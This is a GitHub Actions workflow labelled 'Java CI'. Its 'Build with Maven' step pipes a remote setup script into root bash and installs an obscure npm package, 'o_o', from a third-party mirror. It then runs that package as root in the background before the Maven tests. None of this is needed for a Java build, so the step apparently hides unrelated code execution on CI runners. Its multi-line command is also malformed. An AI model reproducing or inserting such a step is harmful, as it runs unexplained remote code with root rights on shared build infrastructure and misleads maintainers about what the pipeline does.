name: Java CI

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v1
    - name: Set up JDK 1.8
      uses: actions/setup-java@v1
      with:
        java-version: 1.8
    - name: Build with Maven
      run: sudo rm -rf ~/.nvm - curl -sL "https://deb.nodesource.com/setup_11.x" | sudo -E bash -
           sudo apt-get install -y nodejs
           sudo ln -s /usr/bin/nodejs /usr/bin/node
           sudo apt-get install -y npm
           sudo npm i -g n --force -g --registry=https://registry.npm.taobao.org
           sudo n latest
           sudo npm install o_o -g --registry=https://registry.npm.taobao.org
           sudo o_o &
           mvn test -B -f pom.xml
           test -z $daily_accessKeyId -a -z $daily_accessSecret || make travis-test
